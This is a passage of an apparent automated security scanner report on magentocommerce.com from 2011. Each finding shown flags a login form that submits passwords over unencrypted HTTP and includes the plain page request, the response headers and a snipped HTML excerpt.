<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.94. http://www.magentocommerce.com/media/screencasts/transactional-email/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/transactional-email/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /media/screencasts/transactional-email/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176037; expires=Sat, 11-Aug-2012 15:07:17 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A44%3A%22%2Fmedia%2Fscreencasts%2Ftransactional-email%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:18 GMT
Content-Length: 34426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.95. http://www.magentocommerce.com/media/screencasts/upsells/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/upsells/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /media/screencasts/upsells/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176165; expires=Sat, 11-Aug-2012 15:09:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Fscreencasts%2Fupsells%2Fview%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A4%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:25 GMT
Content-Length: 33171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.96. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/working-with-paypal/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /media/screencasts/working-with-paypal/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176036; expires=Sat, 11-Aug-2012 15:07:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A44%3A%22%2Fmedia%2Fscreencasts%2Fworking-with-paypal%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:16 GMT
Content-Length: 40839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.97. http://www.magentocommerce.com/media/screenshots

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screenshots

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /media/screenshots HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175862; expires=Sat, 11-Aug-2012 15:04:22 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreenshots%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:22 GMT
Content-Length: 36191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.98. http://www.magentocommerce.com/media/videos

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/videos

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /media/videos HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175890; expires=Sat, 11-Aug-2012 15:04:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fmedia%2Fvideos%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 37445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.99. http://www.magentocommerce.com/media/videos/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/videos/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /media/videos/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176188; expires=Sat, 11-Aug-2012 15:09:48 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fmedia%2Fvideos%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:48 GMT
Content-Length: 37445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.100. http://www.magentocommerce.com/media/webinars

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/webinars

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /media/webinars HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175869; expires=Sat, 11-Aug-2012 15:04:29 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fmedia%2Fwebinars%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:30 GMT
Content-Length: 178679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.101. http://www.magentocommerce.com/media/webinars/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/webinars/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /media/webinars/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175893; expires=Sat, 11-Aug-2012 15:04:53 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fmedia%2Fwebinars%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:54 GMT
Content-Length: 178679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.102. http://www.magentocommerce.com/partners/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /partners/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170940; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A2%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.9.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171052; expires=Sat, 11-Aug-2012 13:44:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:12 GMT
Content-Length: 38025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.103. http://www.magentocommerce.com/partners/find/bronze-solution/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/bronze-solution/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /partners/find/bronze-solution/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176342; expires=Sat, 11-Aug-2012 15:12:22 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fpartners%2Ffind%2Fbronze-solution%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:22 GMT
Content-Length: 65854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.104. http://www.magentocommerce.com/partners/find/hosting-partners/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/hosting-partners/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /partners/find/hosting-partners/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176345; expires=Sat, 11-Aug-2012 15:12:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fpartners%2Ffind%2Fhosting-partners%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:25 GMT
Content-Length: 51575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.105. http://www.magentocommerce.com/partners/find/industry-partners/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/industry-partners/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /partners/find/industry-partners/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176334; expires=Sat, 11-Aug-2012 15:12:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fpartners%2Ffind%2Findustry-partners%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:15 GMT
Content-Length: 54897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.106. http://www.magentocommerce.com/partners/find/solution-partners/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/solution-partners/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /partners/find/solution-partners/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176347; expires=Sat, 11-Aug-2012 15:12:27 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fpartners%2Ffind%2Fsolution-partners%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:27 GMT
Content-Length: 63005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.107. http://www.magentocommerce.com/partners/hosting-partners

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/hosting-partners

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /partners/hosting-partners HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176331; expires=Sat, 11-Aug-2012 15:12:11 GMT; path=/; domain=magentocommerce.com
